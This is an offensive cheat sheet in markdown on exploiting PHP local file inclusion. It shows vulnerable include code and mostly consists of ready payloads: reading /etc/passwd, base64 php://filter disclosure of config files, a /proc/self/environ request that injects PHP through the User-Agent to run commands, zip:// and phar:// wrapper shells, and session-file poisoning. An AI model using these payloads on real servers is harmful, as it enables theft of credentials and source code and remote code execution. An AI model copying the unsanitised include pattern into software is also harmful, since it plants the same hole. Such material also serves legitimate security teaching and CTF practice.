Tricky-ways-to-exploit-PHP-Local-File-Inclusion.md

Tricky ways to exploit PHP Local File Inclusion

Introduction

Brought from Wikipedia, Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution.

For instance:

include $_GET['file'];

or harder one,

include $_GET['file'] . ".php";

Tricks

Direct Local File Inclusion

• Reading arbitrary files:

  • index.php?file=/etc/passwd
  • index.php?file=php://filter/convert.base64-encode/resource=config.php

• Remote code exection:

  • /proc/self/environ

    GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1
    Host: www.site.com
    User-Agent: <?php echo assert($_GET['cmd']);?>
    

  • Zip and Phar wrappers

    • index.php?file=zip://image.zip#shell.php
    • index.php?file=phar://image.phar/shell.php

  • Session Files

    • PHP5 stores session files in /var/lib/php5/sess_*

      Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
      index.php?file=/var/lib/php5/sess_123php
      

Indirect Local File Inclusion

• Reading arbitrary files:

  • index.php?file=php://filter/convert.base64-encode/resource=config # will append ".php" at the end

• Remote code exection:

  • Zip and Phar wrappers
    • index.php?file=zip://image.zip#shell
    • index.php?file=phar://image.phar/shell
  • Session Files
    • PHP5 stores session files in /var/lib/php5/sess_*

      Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
      index.php?file=/var/lib/php5/sess_123
      

Reference

1. File inclusion vulnerability
2. 通过 zip/phar 协议包含文件
3. AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)
4. lucyoa/ctf-wiki